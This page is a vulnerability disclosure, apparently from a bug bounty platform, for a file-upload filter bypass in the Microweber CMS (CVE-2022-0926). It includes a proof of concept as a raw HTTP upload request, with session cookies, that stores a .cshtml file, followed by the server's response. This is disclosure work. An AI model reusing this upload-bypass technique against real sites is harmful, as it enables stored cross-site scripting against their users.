Lucene search
Rajeshpatil013DC5D1555-0108-4627-B542-93352F35FA17HistoryMar 09, 2022 - 6:40 p.m.
File upload filter bypass leading to stored XSS
2022-03-0918:40:30
rajeshpatil013
www.huntr.dev
7
0.001 Low
EPSS
Percentile
21.6%
Description
A User Can uplaod .cshtml file with XSS payload.
Proof of Concept
Login to the demo portal with admin creds at https://demo.microweber.org/demo/admin/
Navigate to page create functionality at https://demo.microweber.org/demo/admin/page/create
Select the picture upload request in burp and modify the filetype request as below (.cshtml filetype in name & xss payload in body)
Sample post request
POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; mw-back-to-live-edit=true; show-sidebar-layouts=1; _ga=GA1.2.1990870926.1646662573; twk_uuid_599594841b1bed47ceb0520f={"uuid":"1.4gkrYx1pzbRZRQsvreYdgHaygG5EJY38fHOKxQz8FFKqX7uVHEiHATiTi6PECYDSbfVRQpTMHYk0YbGWZIKevu3luS32NQqhPAhdmzQ5EM9f6aPpZpmc8W8L174F1NvcgS2BLVxa8rgdUYdRPot","version":3,"domain":"microweber.org","ts":1646662604068}; laravel_session=Cgwk6v6SW3Pe44qMKD4mzhxN5Hkl7qPviYDYyL9k; csrf-token-data=%7B%22value%22%3A%22KLxn5nyDA3qx7MB7mvgGDPMDiip4h8GeY3wI9nza%22%2C%22expiry%22%3A1646839612227%7D; back_to_admin=https%3A//demo.microweber.org/demo/admin/page/create
Content-Length: 577
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjHgSED0Yg78agVSE
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.microweber.org/demo/admin/page/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryjHgSED0Yg78agVSE
Content-Disposition: form-data; name="name"
a.cshtml
------WebKitFormBoundaryjHgSED0Yg78agVSE
Content-Disposition: form-data; name="chunk"
0
------WebKitFormBoundaryjHgSED0Yg78agVSE
Content-Disposition: form-data; name="chunks"
1
------WebKitFormBoundaryjHgSED0Yg78agVSE
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: text/html
<div></div>
------WebKitFormBoundaryjHgSED0Yg78agVSE--
Response
HTTP/1.1 200 OK
Date: Wed, 09 Mar 2022 18:14:17 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Mar 2022 18:14:17 GMT
Connection: close
Content-Type: application/json
Content-Length: 129
{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/a_11.cshtml","name":"a_11.cshtml","bytes_uploaded":"577"}
[my link](file:///C:/Users/rajesh/Desktop/1.JPG)
Impact
Stored XSS through file upload feature
Related
github
github
Cross-site Scripting in microweber
2022-03-13 00:00:54
osv
osv
CVE-2022-0926
2022-03-12 10:15:08
Cross-site Scripting in microweber
2022-03-13 00:00:54
cvelist
cvelist
nvd
nvd
CVE-2022-0926
2022-03-12 10:15:08
veracode
veracode
Cross-site Scripting (XSS)
2022-03-14 14:16:55
prion
prion
Unrestricted file upload
2022-03-12 10:15:00
cnvd
cnvd
Microweber Cross-Site Scripting Vulnerability (CNVD-2022-20797)
2022-03-14 00:00:00
cve
cve
CVE-2022-0926
2022-03-12 10:15:08